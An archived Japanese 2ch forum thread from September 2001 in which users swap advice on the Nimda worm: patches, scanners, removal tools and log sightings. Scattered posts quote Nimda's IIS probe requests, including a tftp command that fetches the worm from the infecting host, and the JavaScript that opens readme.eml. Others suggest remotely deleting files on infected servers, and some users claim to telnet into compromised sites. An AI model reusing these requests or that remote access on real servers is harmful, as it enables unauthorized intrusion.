5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

Nimda !! その弐

1 :名無しさん@お腹いっぱい。 :01/09/20 17:13
まだまだこれから・・?

2 :2:01/09/20 17:15
駆除成功

3 :名無しさん@お腹いっぱい。:01/09/20 17:23
そのうち亜種出るかな。。。

4 :名無しさん@お腹いっぱい。:01/09/20 17:26
●前スレ 「Nimda !!」
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1000870301

●関連リンク
マイクロソフト「Nimda ワーム に関する情報」
http://www.microsoft.com/japan/technet/security/nimdaalrt.asp

IPAセキュリティセンター
http://www.ipa.go.jp/security/topics/newvirus/nimda.html

シマンテック株式会社
http://www.symantec.com/region/jp/sarcj/data/w/w32.nimda.a@mm.html

トレンドマイクロ株式会社
http://www.trendmicro.co.jp/nimda/

日本ネットワークアソシエイツ株式会社
http://www.nai.com/japan/virusinfo/virN.asp?v=W32/Nimda@MM

●関連スレ
ニュース速報板「スーパー初心者のためのMSNウイルスすれ」
http://news.2ch.net/test/read.cgi?bbs=news&key=1000945627

5 :名無しさん@お腹いっぱい。:01/09/20 17:33
ageとく

6 :補足:01/09/20 17:35
●関連スレ
ニュース速報板「スーパー初心者のためのMSNウイルスすれ2」
http://news.2ch.net/test/read.cgi?bbs=news&key=1000909667

ニュース速報板「スーパー初心者のためのMSNウイルスすれ3」
http://news.2ch.net/test/read.cgi?bbs=news&key=1000945627

7 :補足:01/09/20 17:36
トレンドマイクロ・Nimda駆除単体ツール
http://www.trendmicro.co.jp/nimda/tool.asp

8 :補足:01/09/20 17:39
現在でまわっているデマ情報
http://keisui.com/GIGAZINE/cgi-bin/news/html/lg/000325.htm

IEバージョン確認法
http://www.geocities.co.jp/Technopolis/2082/Soft/Ie/OE5str.htm

オンラインスキャン
http://www.trendmicro.co.jp/hcall/scan.htm

ウィルス情報
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.nimda.a@mm.html
http://www.nai.com/japan/virusinfo/virN.asp?v=W32/Nimda@MM
http://www.trendmicro.co.jp/virusinfo/troj_nimda.htm


>>1 せめてこれくらいはっとけYO!
質問が無限ループになるんだYO!

9 :名無しさん@お腹いっぱい。:01/09/20 17:39
1スレから
------------------------------------------------------
925 名前:名無しさん@お腹いっぱい。 :01/09/20 17:02
aa2000030222007.userreverse.dion.ne.jp
から nimda アクセスのログがいっぱい
あるんですが、、
pppサーバの名前とも思えないから、dion内部で使われているマシンか?


926 名前:名無しさん@お腹いっぱい。 :01/09/20 17:15
>>925
HTTPリバースプロキシかな?
--------------------------------------------

10 :補足の補足:01/09/20 17:42
状況報告ver1.06
感染の有無の確認

2.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT
 *.emlが大量にHITした際は確定。
 ただし、それが以前に自分の書いた見覚えのあるメールだったら、
それはウイルスではない。
 そうでないときは後者2個を削除して様子を見る。
 といっても後者二つを消したからウイルスが消えるわけではない。
 ファイルのDLを拒否してもファイルが作成されたという報告
(多分一時ファイルに残っているだけだろうが)があるので、
危険ブラウザでない人もファイルのDLを不許可にした方がいい。
3.『mep』で検索した際に『mep????.tmp』がHITする(らしい)


感染時の対応
 感染してしまった後は、アップデートしても無意味。
 とりあえず感染を拡大しないようにウイルス対応ソフトのHP以外には行かず、ワクチンが出来るまで他のWEBコンテンツを回らない。
 むしろ自他の被害の拡大を考えるならOS(又は感染以前のバックアップ)から
入れ直した方がいい。

 感染前に対応ブラウザにして、DL拒否しているのにスキャンで
感染しているというときは多分『インターネット一時ファイル』
に残っているので、気になるならツール→インターネットオプション→
全般→インターネット一時ファイル→ファイルの削除

11 :名無しさん@お腹いっぱい。:01/09/20 17:42
アップデートしなくちゃいけないのは、Internet Explorer5.01と5.5の人だけですよね?
5.0でよかった

12 :名無しさん@お腹いっぱい。:01/09/20 17:45
>11
おいおい

13 :補足の補足:01/09/20 17:47
■アップデートしなけりゃならない人

   IE5.5SP1以下の人(絶対しろ!!)

■アップデートする場所

   http://www.microsoft.com/japan/ie

■アップデートするもの

   IE5.5SP2 or IE5.01SP2 or IE6.0

■感染しない方法

   ●ツール→インターネットオプションからJavaScriptの実行を
    オフにする
   ●セキュリティーのレベルを「中」にする

   ●感染したサイトに行ったら、ダイアログが出てくるが、
    すべて「キャンセル」と答える。
      ※「はい」と答えると感染します!!!


( ´∀`) < これでいいかね??

14 :名無しさん@お腹いっぱい。:01/09/20 17:48
こんなのでてるYO!

http://www.hotwired.co.jp/news/news/technology/story/20010920301.html
『Nimda』や『コード・レッド』を捕らえる簡単ツール(上)

誰かテストしてレポートきぼーん (漏れマカーなのでスマソ)

15 :名無しさん@お腹いっぱい。:01/09/20 17:56
>>10
>ファイルのDLを拒否してもファイルが作成されたという報告

GETリクエスト発行
 ↓
Content-Type判明
 ↓
ブラウザが直接扱う物でなければ保存等のダイアログが出る

普通のブラウザはこういった手順になると思うのでブラウザによっては
保存しなくてもキャッシュに残ってしまう物もあるようです。

16 :11:01/09/20 18:00
ハッ!!(・д・) ありがとうございます

17 :11:01/09/20 18:01
あのーあのー
IE5.5SP2 or IE5.01SP2 or IE6.0
なら、どれにアップロードするのが一番いいんでしょうか?
好みの問題ですかね?

18 :(´Д`;):01/09/20 18:02
>>8リンク先。
昨夜はシマンテックウイルス情報サイトでこのコメント無かったよ
うな気がするぞ。
"次に、Guests and Administratorsグループにゲストユーザを追
加することによって、ゲストアカウントに管理者権限を与えます。
さらに、ワームはC$ = C:\を共有します。この設定はコンピュータ
が再起動されなくても有効になります。"

ワーム本体駆除してもバックドア開いてることに成らないか?
しかも、アプリ使ったバックドアと違う。正規?な裏口。
ちゃんとユーザー管理してない2k使いは不味い??
nimdaの逆読み[admin]。
おれ、どの道guestアカウント自体禁止してるから良いけど。
・・・コレで解析データ出尽くしたか??
そこはかとなく、まだ何か有りそうだ。。
ソース、自分で読んだ方が色々面白いね。

19 :名無しさん@お腹いっぱい。:01/09/20 18:04
ちょっと攻撃が鈍ってきたと思うのは、気のせい?

20 :名無しさん@お腹いっぱい。:01/09/20 18:08
>>18 生アドミンでログインしてやつもいるからなぁ
しかもパス設定してない状態で。バックドアって騒いでるけど、ドア全開
の奴がごろごろいるからな。NT系使ってるやつで。

21 :(o_ _)o パタッ:01/09/20 18:12
攻撃を心配するなら、各国の記念日などや国際情勢を追うのも
対策のひとつであると思うけど。
ま、知ってたから防御出来る訳ではないが。

22 :18:01/09/20 18:12
>>20
uuu
それ以前の問題な訳ね。。。

23 :名無しさん@お腹いっぱい。:01/09/20 18:32
ウイルス無料配給の感染Webサイトって、片端からtelnetでログインできるって話もあるぞ。

24 :名無しさん@お腹いっぱい。:01/09/20 18:33
クラカートラッププログラム「LaBrea」マンセー

LaBrea DLページリンク
http://www.hackbusters.net/LaBrea/LaBrea.html

これは(・∀・)イイ
   ↓
だけどオレ、リヌ環境が無い
   ↓
(+д+)マズー
   ↓
仕方ないから眠ってたMMX200マシンリヌ向けに引きずり出そう
   ↓
(゚д゚)ウマー

25 :名無しさん@お腹いっぱい。:01/09/20 18:36
で〜〜〜〜結局テロとの関連は
どうだったのかしら??w

26 :名無しさん@お腹いっぱい。:01/09/20 18:39
>>23
10ヵ所試したけど
全部は入れなかったよ(w

27 :名無しさん@お腹いっぱい。:01/09/20 18:39
>>6-13 でたくさん補足情報だしたのに一言もねぎらってくれないとは・・・
せめて、ごくろーの一言が欲しかった・・・
鬱だ、回線切って首吊ろう

28 :名無しさん@お腹いっぱい。:01/09/20 18:43
>>27
お疲れ様でした。

29 :名無しさん@お腹いっぱい。:01/09/20 18:47
>>25
あなたはどう思っているの?

>>27
ご苦労様。

30 :名無しさん@お腹いっぱい。:01/09/20 18:48
>>27 とっても参考になったYO!

31 :名無しさん@お腹いっぱい。:01/09/20 18:49
これで確認しれ。>>11

MS01-020の脆弱性の有無の確認方法
http://memo.st.ryukoku.ac.jp/archive/200109.month/1286.html

32 :名無しさん@お腹いっぱい。:01/09/20 18:50
IEのバージョンアップ云々以前に
「バージョンアップ以外の対抗策」
が有るのか無いのかの方が気になる。

バージョンアップしてもすぐ穴があくのは
目に見えてるし、IE&MSに頼らない
防衛手段の方が大事だろう。

33 :名無しさん@お腹いっぱい。:01/09/20 18:52
>>32
じゃあ、Mac買えば?

34 :名無しさん@お腹いっぱい。:01/09/20 18:53
>>26

やっぱ入れるのか(゚д゚)

35 :名無しさん@お腹いっぱい。:01/09/20 19:00
Nimdaが発生した当日msn使ってたけどウイルス感染しませんでした。
ie5.0です。sp2でもない。なぜ??widows up dateしてれば問題ないってこと?
ダウンロード画面もなし。os/winme

36 :名無しさん@お腹いっぱい。:01/09/20 19:00
知人の5.0を頼まれてSP2にした。

再起動してIEを開いたら、いままで設定していたYahooじゃなくて、いきなり


Microsoftだゴルァ! IE5.5うんたらかんたらアップデートしろゴルァ(意訳)


というのが開いてすっげーコワカターヨ(´Д`)

そのときはマジで地雷踏んだかと思った。

37 :名無しさん@お腹いっぱい。:01/09/20 19:01
>>35

何時ごろすか?

自動ダウンロードの設定外していたとか?

38 :11:01/09/20 19:03
>>27
いちおう>>16でお礼を言っときましタ!

>>31
ありがとうございマス
IE6に完全対応していないサイトもあるみたいでスネ

39 :名無しさん@お腹いっぱい。:01/09/20 19:03
>>27

よくがんばった!感動した!

40 :名無しさん@お腹いっぱい。:01/09/20 19:05
>>27 お疲れさま〜。すまんタイミング逸してお礼言えなかった。
逝かないでくれ。

41 :名無しさん@お腹いっぱい。:01/09/20 19:10
(゜д゜)逝ってしまわれたのか?

42 :名無しさん@お腹いっぱい。:01/09/20 19:12
ニムダに感染したニダ。

http://www.hyundaijapan.co.jp/

43 :名無しさん@お腹いっぱい。:01/09/20 19:13
http://www.yomiuri.co.jp/hochi/geinou/sep/o20010919_5.htm

44 :感染ニダ:01/09/20 19:15
パイナップルカンパニー感染中
http://www.pineapple.co.jp/

generator2.pineapple.co.jp - - [20/Sep/2001:18:23:33 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281 "-" "-"
generator2.pineapple.co.jp - - [20/Sep/2001:18:23:33 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279 "-" "-"

45 :ななし:01/09/20 19:18
今、またmsnのトップページが真っ白になってない?
リロードしても白い。
私だけ?

46 :名無しさん@お腹いっぱい。:01/09/20 19:20
>>35です。
当日は夜9時ころから翌日の5時ころまでインターネット使ってました。
それで、その日はホットメールとMSNメッセンジャーの設定でサイトにずっとアクセス
してました。もちろんweb上です。
PCにはNortonIS2001入ってますが、定義ファイルはまだできてなかったはずですし。
確かにどのサーバにアクセスするのもすごく重かったのは覚えております。
それって感染した兆候らしいんですが。
翌日大騒ぎになってるのでノートンアップデートして、ウイルス検索かけてみると
結果感染項目なし。
いろいろ考えた結果、ノートンのスクリプトブロッキングが働いた?とか。
ちょっと疑問です。

47 :名無しさん@お腹いっぱい。:01/09/20 19:20
>>45

漏れは白くない・・。

http://www.msn.co.jp/home.htm

48 :名無しさん@お腹いっぱい。:01/09/20 19:22
>>46

あ、トップだったよね、感染・ウイルスディスペンサーしたのは。

たしかホットメールは買収した経緯で鯖がWindowsじゃない、って嗤われていた肝。

49 :名無しさん@お腹いっぱい。:01/09/20 19:23
>>42
そんなとこ晒していいニダか?
まあ自業自得ニダね。

50 :名無しさん@お腹いっぱい。:01/09/20 19:24
>>49

ワラタ

51 :45:01/09/20 19:25
>>47
ありゃ、ほんとだ。
私が見てたのは http://www.msn.co.jp/ でした。スマソ。

52 :名無しさん@お腹いっぱい。:01/09/20 19:30
>>51

しかし自主流通ウイルスについてはなにも書いてないな。

直リンここ。
http://help.msn.co.jp/notice.htm

MSがウイルス配布した記念にミラーすべし。

53 :45:01/09/20 19:42
>>52
ありがとー。

しかしさ、>>47http://www.msn.co.jp/home.htm を開いて左側のMSNチャンネル
ってとこの「米同時多発テロ特集 New!」「コンピュータ New!」をクリックすると
やはり真っ白ページになってるのは、何か気持ちわるくて気になるー。

54 :名無しさん@お腹いっぱい。:01/09/20 19:44
おいおい、漏れWin2K SP2なのになんでWindows UP Dateに行くと

* * Windows 2000 Service Pack 2 (SP2) には多数の重要な更新があります。Microsoft は Windows 2000 SP2 のインストールを推奨します

なんてのが表示されるんだい?

55 :いにしえ人:01/09/20 19:45
Netscape Navigator Gold Version 3.01Gold は大文夫ですか?

56 :名無しさん@お腹いっぱい。:01/09/20 19:45
>>53
JavaScriptオフってるだろ。

57 :名無しさん@お腹いっぱい。:01/09/20 19:49
>>53
「米同時多発テロ特集 New!」「コンピュータ New!」をクリックしたよ。
真っ白になるのはあなただけ〜。

58 :27:01/09/20 19:49
>逝かないでくれ
逝ってません。心配掛ける発言してスマソ。

今、私の発行するメルマガで読者に警告メールを出してました。
よく考えたら、危ない人が多そうだからね。
これで5500人ぐらい救われたら嬉しいな・・・(笑)

やっぱ、仕入れた情報は共有していこうな。
くだらんワーム作る奴なんかに屈してたまるか!
知り合いの奴にもどんどん警告した方がいいね。
2ch以外でも頑張ってきます! ぢゃ!

59 :名無しさん@お腹いっぱい。:01/09/20 19:49
Nimdaのアタックが物凄いので、IP管理元に苦情を言いたいんです。
だけど、そのIPが日本語わかりませんの国なので、英語で書かないと
いけないのかなとおもうんですが、どのような英文を書けばいいですか?
識者の方、テンプレートお願いできますか?

60 :名無しさん@お腹いっぱい。:01/09/20 19:51
>>59
無駄だと思うので放っておこうよ。
どうしてもというのであれば機械翻訳でも意味は通じるでしょう。
Exciteでも使って。

61 :名無しさん@お腹いっぱい。:01/09/20 19:52
>>58
27は神だ!!

62 :名無しさん@お腹いっぱい。:01/09/20 19:51
>>55
ネスケは基本的に問題ないと思われ。

63 :45:01/09/20 19:52
>>56
JavaScriptオフってます。そのせいですか!
だったら無駄に騒いですみません。
教えてくださってありがとう。

64 :名無しさん@お腹いっぱい。:01/09/20 19:53
>>55
ネスケは大丈夫だと思われ。

65 :名無しさん@お腹いっぱい。:01/09/20 19:53
>>55

言われると思って試したよ。

さっきのニダの感染サイト行ったらきっちりダウンロードしようとしたよ。
http://www.hyundaijapan.co.jp/

Netscape NavigatorTM Version 3.04Goldならネスケのサイトで入手できるよ。

66 :名無しさん@お腹いっぱい。:01/09/20 19:58
>>65
ネスケの古いのには別のセキュリティホールがあるよ。
http://java-house.etl.go.jp/~takagi/java/security/netscape.net.urlconnection/Test.html

67 :いにしえ人:01/09/20 19:59
>>62,64,65
みんなおおきに!

>>65
3.04Goldなら大文夫なの?

68 :名無しさん@お腹いっぱい。:01/09/20 20:02
>>67

スマソ、3.04Goldでやっても同じだった

69 :名無しさん@お腹いっぱい。:01/09/20 20:03
>>66

あれ?じゃあネスケってどのバージョンなら平気なのさ?

70 :いにしえ人:01/09/20 20:04
>>68
ジャバスクリプトとかジャバをオフにしててもいっしょかなあ?

71 :名無しさん@お腹いっぱい。:01/09/20 20:08
>>42踏んだらノートン先生が助けてくれた。

72 :名無しさん@お腹いっぱい。:01/09/20 20:09
JavaScriptで例のfileをゲットするから、
OFFにしてると、問題とおもわれ。

おそらく、パッチ無しIEでもJavaScriptをOFFにしてたら、
大丈夫だとおもわれ。(未確認だけどね)

けど、IEはメーラーにも影響を及ぼすので、
パッチ当てが吉とでてるね。

73 :名無しさん@お腹いっぱい。:01/09/20 20:11
>>70

すまん、オレねすけキライなんだ。自分でダウンして試してくれ。

http://sillydog.org/narchive/
ここから行かれる

ftp://archive:oldies@archive.netscape.com/archive/navigator/3.04/shipping/english/windows/windows95_or_nt/navigator_gold_complete/g32e304p.exe

74 :名無しさん@お腹いっぱい。:01/09/20 20:10
普段ネスケしか使って無くても、IE5がインストールされてたら少し危ないカモね。
emlの関連づけはされてるかもしれないし。

75 :72:01/09/20 20:14
それに、DLしますか?ってメッセージは
感染したことならんよ。
素直にキャンセルするべし。

DLして実行したらしらんけどね。

76 :名無しさん@お腹いっぱい。:01/09/20 20:15
ネスーケ+JAVAScriptONでは*.emlは無視されるかDLを聞いてくる筈なので、ここで
何もしなければOKです。
仮にDLしても触らなければ何も起こらない筈ですが。
・・・勘違いしてます?

77 :名無しさん@お腹いっぱい。:01/09/20 20:18
>>76

すまん、してたかも

78 : :01/09/20 20:18
IE5.5で、
   ヘルプ−>バージョン情報
を表示させたら「更新バージョン:SP1」となっていたら、
危ないのか?システム管理者には前からSP2にしろと
いっているのだが。。。。
6.0の正式バージョンはIE5のSP2相当なの?

79 :名無しさん@お腹いっぱい。:01/09/20 20:19
俺はURLのMAILタグを無効にして、javaとActiveX止めてるから大丈夫だと思うけど
実際はどんなスクリプトなんだろ?

80 :質問は:01/09/20 20:20

質問はここ逝け。丁寧に教えてくれてるぞ。

http://news.2ch.net/test/read.cgi?bbs=news&key=1000945627

81 :こんなの:01/09/20 20:26
<html><Script language="JavaScript">
Window.open(”readme.eml”, null, ”resizable=no,top=6000,left=6000”)
</script></html>

82 :名無しさん@お腹いっぱい。:01/09/20 20:28
>>59
私のつたない英語でよかったら使ってください。20通くらいは出したYO。

Hello, one of your server is attacking me.
Maybe your server is infected by W32.Nimda.

ちなみにIPからどのNICに属しているかを調べるのにはipwが便利。

83 :名無しさん@お腹いっぱい。:01/09/20 20:32
IE5のバージョン(キケーン=サイト見ただけ、メールプレビューで感染)
5.00.2014.0216=IE5.0=キケーン
5.00.2314.1003=IE5.0(Office2000付属)=キケーン
5.00.2919.6307=IE5.01=キケーン
5.00.2920.0000=IE5.01(W2K付属)=キケーン
5.00.3105.0106=IE5.01SP1=キケーン
5.00.3314.2101=IE5.01SP2=ウマー
5.50.4134.0600=IE5.50=キケーン
5.50.4522.1800=IE5.50SP1=キケーン
5.50.4807.2300=IE5.50SP2=ウマー
でもウマーのSP2もダウソしたり、添付ファイル開けば感染。

84 :名無しさん@お腹いっぱい。:01/09/20 20:33
http://windowsupdate.microsoft.com/

重いよ(´Д`;)

85 :あひ:01/09/20 20:34
CodeRedと違って挙動が派手(一般ユーザに被害あり)
           ↓
NIMDAと同じ穴をついたワームがあるらしいぞ!?
           ↓
CodeRedの感染に気づいていなかった奴もCodeRedの感染に気づく
(NIMDA対策で穴もふさがる)
           ↓
CodeRedのウザイアクセスも減る

ってならんかね

86 :名無しさん@お腹いっぱい。:01/09/20 20:34
そういや誰かDump見たいとか言ってなかったっけ?

DLLのならココにあったぞ。
http://www.hackbusters.net/strings.txt

87 :名無しさん@お腹いっぱい。:01/09/20 20:36
5.00.3314.2101=IE5.01SP2=ウマー

なんだけど、

5.50.4807.2300=IE5.50SP2=ウマー

にすべき?不要なアップデートはしないほうがヨシ! ?

88 :名無しさん@お腹いっぱい。:01/09/20 20:38
>>83

わかりやすい。アリガトウ。

89 :名無しさん@お腹いっぱい。:01/09/20 20:43
>>85
Codered発生後数ヶ月経ったが未だに糞鯖立てようとするアホやメールが送られても対策拒否するヤツがいるのでムリ。

90 :初心者なんですが:01/09/20 20:47
ゆうべJavaScriptは切ったままあやしげな海外サイト回ったあと不安になり
McAfeeをアップデートしてウィルススキャンしようとしたら
エラーが出てできません。
トレンドマイクロでオンラインスキャンしたらウィルス検出はされなかったんですが
だいじょうぶでしょうか?

91 :名無しさん@お腹いっぱい。:01/09/20 20:50
http://www.hanna-group.co.jp/
(↑アクセス注意)
もろにヤラレちゃったね...。Readmeあるし(w

92 :外出?:01/09/20 20:52
Nimda Scanner from eEye
http://www.eeye.com/html/Research/Tools/nimda.html

93 :名無しさん@お腹いっぱい。:01/09/20 20:55
IE5.50SP2にしたOutlook Expressのタイトル画面は、
インターネットオプションのセキュリティが「中」以上だと
表示されずに真っ白になるようだ。既出?

94 :名無しさん@お腹いっぱい。:01/09/20 20:55
このウイルス対策ぜんぜんダメぢゃん(´Д`;)

http://itpro.nikkeibp.co.jp/free/ITPro/ITPROFORUM/20010917/2/

95 :あああ:01/09/20 21:00
しかし、、、ITProとは、ダサい名前だ、、、。
「ダサい」なんて言ってる俺もダサいな

96 :名無しさん@お腹いっぱい。:01/09/20 21:07
きのうアメリカのegomedia.comでかんせんしたよ。
で、\tempのなかにあったreadme.exeいじくってたら、
あばれまくったよ。すごかったよ。ぐちゃぐちゃになったよ。
なのでリカバリしたよ。
みんなegomediaいってみてね!

97 :96:01/09/20 21:10
そうそう、そのときreadme.exeが\tempのなかに9つあったことは
ここだけのひみつにしといてね。

98 :名無しさん@お腹いっぱい。:01/09/20 21:12
分かってていじりまわす96に敢闘賞

99 :イ寺 ◆vx2QuQRA :01/09/20 21:13
>>90 まかふぃーは使えないので、ウイルスバスターなりノートンアンチウイルス入れてください。

100 :名無しさん@お腹いっぱい。:01/09/20 21:14
>>96

情報ふるいんだyo!

もう閉鎖されちゃってるyo!

101 :名無しさん@お腹いっぱい。 :01/09/20 21:16
>>32
Microsoft VM のビルド番号を調べて、3317 またはそれ以前の 3000 シリーズであれば、すべて影響を受けます。


調べ方
1)[スタート] ボタンをクリックし、[検索] - [ファイルやフォルダ] をクリックします。

2)[名前] ボックスに MSJAVA.DLL と入力し、[探す場所] ボックスで OS がインストールされているドライブを指定して、[検索開始] ボタンを押します。

3)検索結果として表示された MSJAVA.DLL ファイルをマウスの右ボタンでクリックし、表示されたメニューから [プロパティ] をクリックします。

4)[バージョン情報] のタブを開き、ファイル バージョンを確認します。ファイル バージョンの数字の最後の 4 桁が、Microsoft VM のビルド番号です。

ビルドが上記の対象でしたら、新しいMicrosoft VMをDLした方が良いです。

注意事項やDLの仕方は、以下のURLです。
http://www.microsoft.com/japan/technet/security/SecFaq.asp?sec_cd=ms00-075

102 :名無しさん@お腹いっぱい。:01/09/20 21:17
>>99

ちなみに まかふぃーってこんな。
http://slashdot.jp/article.pl?sid=01/08/21/0428210

103 :名無しさん:01/09/20 21:19
>>91
HTML後ろのほうの

<!--Namo WebEditor Data 4.0
:EmbededNPI1
8HgAAHhe7bx1XB1L1ja6N7pxDxo8AYK7W9DgLsHd3V02FjQ4wSFIcHeHACFACBDcNh6Cewh2
N3MmM3Pf+8795ztnzsw3qd+vdq/uXb1q1dOr19NV1V3iKooyQAAcoAUAADyB5kRYAKANugX+
(snip)
-->

って何?馬鹿でかいんだけど。

104 :96:01/09/20 21:21
>>100
いまリカバリおわってやっとネットにもどってきたから
そのあいだのことなにもしらないのにつめたくいわれて
ちょっとうれしい。

105 :名無しさん@お腹いっぱい。:01/09/20 21:23
>>104

行けって言われたから行っただけだyo!

つまんなかったyo!

自分だけ楽しんでズルイyo!

106 :名無しさん@お腹いっぱい。:01/09/20 21:26
>>104

最新はこんなだyo!

42 名前:名無しさん@お腹いっぱい。 本日の投稿:01/09/20 19:12
ニムダに感染したニダ。
http://www.hyundaijapan.co.jp/

44 名前:感染ニダ 本日の投稿:01/09/20 19:15
パイナップルカンパニー感染中
http://www.pineapple.co.jp/

107 :感染発見ニダ:01/09/20 21:27
http://www.from-jp.co.jp/

108 :名無しさん:01/09/20 21:28
感染ニダ!

フロムジャパンインターナショナル株式会社
http://www.from-jp.co.jp/

109 :96:01/09/20 21:31
>>106
まだやみあがりでまったくぶそうできていない
でふぉるとぱそこんでゆけというのかい?

110 :名無しさん@お腹いっぱい。:01/09/20 21:37
三日でアクセスログが3Mになった。
HTTP 1.1のきちんとしたアクセスは0割1分ですがなにか?

111 :名無しさん@お腹いっぱい。:01/09/20 21:40
>>106

リンク先いったけど、無反応だが、正しいのか?

当方IE6。

DLダイヤログとか期待してたんだが・・・

112 :名無しさん@お腹いっぱい。:01/09/20 21:41
とりあえずネタとして永久に嗤えるからミラーしとけ(w

42 名前:名無しさん@お腹いっぱい。 本日の投稿:01/09/20 19:12
ニムダに感染したニダ。
http://www.hyundaijapan.co.jp/

113 :名無しさん@お腹いっぱい。:01/09/20 21:41
昨日の深夜(正確には今日の早朝?)にNimdaに感染したマシンからのアタックが減った。
みたいな記事があったけど今はどうなの? 対策が浸透してもう落ち着いてきたのかな。
俺はサーバー管理しているような偉い人じゃないんでよう分からん。

114 :名無しさん@お腹いっぱい。:01/09/20 21:42
>>111

http://www.hyundaijapan.co.jp/

いま行ったけど出た。例によってJava方面のoffとか?

115 :名無しさん@お腹いっぱい。:01/09/20 21:44
>>109

>いってみてね! (>>96)

116 :名無しさん@お腹いっぱい。:01/09/20 21:46
のーとん先生、キャッシュなんか丁寧に修復しないで捨ててくれればヨイです(微笑)

117 :83=93:01/09/20 21:46
過去の罪?などでMcAfeeをこき下ろしたいのはわかるが、
メーカー製PCのほとんどがMcAfeeプレインストールなので、
初心者が今ノートソやバスターに乗り換えるってのは難しいだろう。
とりあえずNimdaを沈静化させる方が先だ。
スキル低めなユーザーが対応しないとNimdaは止まらないだろう。
折角のプレインストールウイルス対策ソフトを今こそ活用するべきだ。

ちなみにNimdaが検出可能なのは
ウイルスバスター:エンジン5.200以上、パターンファイル941以降(現在942)
ノートンアンチウイルス:定義ファイル2001/09/18以降(現在9/19)
ウイルススキャン:エンジン4.0.70以降、定義ファイル4159以降(現在4161)
駆除ツールも出始めたが、いずれのサイトとも重すぎるゾ。

#重いのは単にマシンのせいかも。
#無印pentium150MHz/RAM48MB/HDD1.4GB/Win95a/IE5.5SP2です。

118 :名無しさん@お腹いっぱい。:01/09/20 21:50
>>101
Javaは関係ないよ。

119 :111:01/09/20 21:51
>>114
Javaオンだったが、もう一度行ったら出たよ。サンクス。

けどね、メディアバーの設定とか聞かれるね。
「いいえ」押してもメディアプレイヤー開くから一瞬あせったね。

120 :名無しさん:01/09/20 21:51
VirusBuster2001を導入してから現代ジャパンのサイトにアクセスしたら、
ちゃんと隔離されたよ。

121 :名無しさん@お腹いっぱい。:01/09/20 21:52
>>117
McAfeeは初心者向けじゃないからオススメできないよお。
ウィルスバスターの体験版のほうがいい。

122 :名無しさん@お腹いっぱい。:01/09/20 21:53
>>117
>過去の罪?などでMcAfeeをこき下ろしたいのはわかるが、
> メーカー製PCのほとんどがMcAfeeプレインストールなので、

古いMcAfeeでスキャンして安心しているのが大勢いる。
なまじプレインストールなのが問題のような。
古すぎてアップデートできないのもある。

思い切って

ウイルスバスター
ノートンアンチウイルス

に乗り換えるのが、

>とりあえずNimdaを沈静化させる方が先だ。

のはやみちじゃなかろうか。

シロウトはパターンファイルなんていってもわからんから、ウチではMcAfeeでスキャンは無効ということにしちまった。

123 :117:01/09/20 21:56
>121
う〜ん。初心者が体験版落としてインストールして使うのと、
プレでインストールしてあるヤツの定義ファイルのアップするのは
どっちが簡単かな〜とか思って。

124 :名無しさん@お腹いっぱい。:01/09/20 21:58
>>123

ダウンページに手順が書いてあるので後者。

125 :ん〜ま:01/09/20 21:58
port80経由でNimdaが送られてくる過程は以下のとおり。

GET /scripts/root.exe?/c+dir
GET /scripts/root.exe?/c+tftp%20-i%20感染元IP%20GET%20Admin.dll%20Admin.dll
GET /scripts/Admin.dll

有効なroot.exeかcmd.exeを検索する。
もし存在が判るとtftpで送信元から本体を転送。
http経由でリクエストを出して起動。

126 :名無しさん@お腹いっぱい。:01/09/20 21:59
>>124

まちがえた、前者。ダウンの方がここ行けで済むから簡単。

127 :121:01/09/20 21:59
>>123
絶対バスターのほうがいいと思う。
だって私がそうだったからさ。<初心者

128 :117:01/09/20 21:59
>122
確かに。プレイインストールのソフト自体やエンジンが
期限切れなら、それこそこの機会にノートン先生ですね。
初心者が期限切れを理解するいい機会だと勝手にプラス思考。

129 :名無しさん@お腹いっぱい。:01/09/20 21:59
trendmicroのnimda関連ページに入れないけど、アクセス過多のせい?

130 :ん〜ま:01/09/20 22:00
単純にリモートでdel%20Admin.dllとかやれば拡散は防げますなあ。

131 :ん〜ま:01/09/20 22:01
>>129
夕方から入れません。topページは見られるけどね。

132 :名無しさん@お腹いっぱい。:01/09/20 22:03
>>125
そっか〜
ルーターのIPフィルタで80ポート塞いであるのが有効なんだ。
勉強なった。

133 :名無しさん@お腹いっぱい。:01/09/20 22:04
>>129

そのようです。

ツールダウンページ
http://www.trendmicro.co.jp/nimda/tool.asp

に直に行くのが確率的に吉かも、です。

http://a504.g.akamai.net/7/500/484/00001/www.trendmicro.co.jp/nimda/fix_nimda.exe
これはツールダウンロードの直リン。

134 :名無しさん@お腹いっぱい。:01/09/20 22:08
>>128
ノートン先生、XP対応になって10月5日新発売。
どうせ買うなら最新版。

http://www.symantec.com/region/jp/news/year01/010918.html

135 :名無しさん@お腹いっぱい。:01/09/20 22:11
>>133

さっきまでほいほい行けたのにここに貼ったら

HTTP/1.1 Server Too Busy

ってなっちゃった(´。`;)


ダウンロードは行けるみたいだからがんばって。
http://a504.g.akamai.net/7/500/484/00001/www.trendmicro.co.jp/nimda/fix_nimda.exe

136 :名無しさん@お腹いっぱい。:01/09/20 22:20
のーとん先生はいつ無償ツール出るんだろうね・・。

http://www.symantec.com/region/jp/sarcj/download/jp/JP-MU.html

137 :うーん:01/09/20 22:22
トレンドマイクロで以前に
最新版に更新していても感染したら代金お返しします ってキャンペーン
やってたような気がするが・・・。

今回、パターンが出る前に感染した人にもキャッシュバックあるのかな?

138 :名無しさん@お腹いっぱい。:01/09/20 22:27
>>137

それで18日の夜、不完全なパターンファイルが出てたのか・・。

139 :名無しさん@お腹いっぱい。:01/09/20 22:32
age

140 :名無しさん@お腹いっぱい。:01/09/20 22:34
アメリカもだと。

■MSサイトに『Nimda』ワーム感染疑惑
http://japan.cnet.com/News/2001/Item/010920-8.html?mn
米マイクロソフトの『FrontPage』ウェブサイトを訪問すると、ウイル
ス対策ソフトが警報を発するようになった。

141 :名無しさん@お腹いっぱい。:01/09/20 22:33
>>86
あー。これとてもナイスです。
ソースが読みやすくなります。ありがとう。

142 :名無しさん@お腹いっぱい。:01/09/20 22:38
ここか?

http://www.microsoft.com/FrontPage/

漏れは反応しないが・・。

143 :前スレの807だったかな?:01/09/20 22:50
>>86
さんくす!!

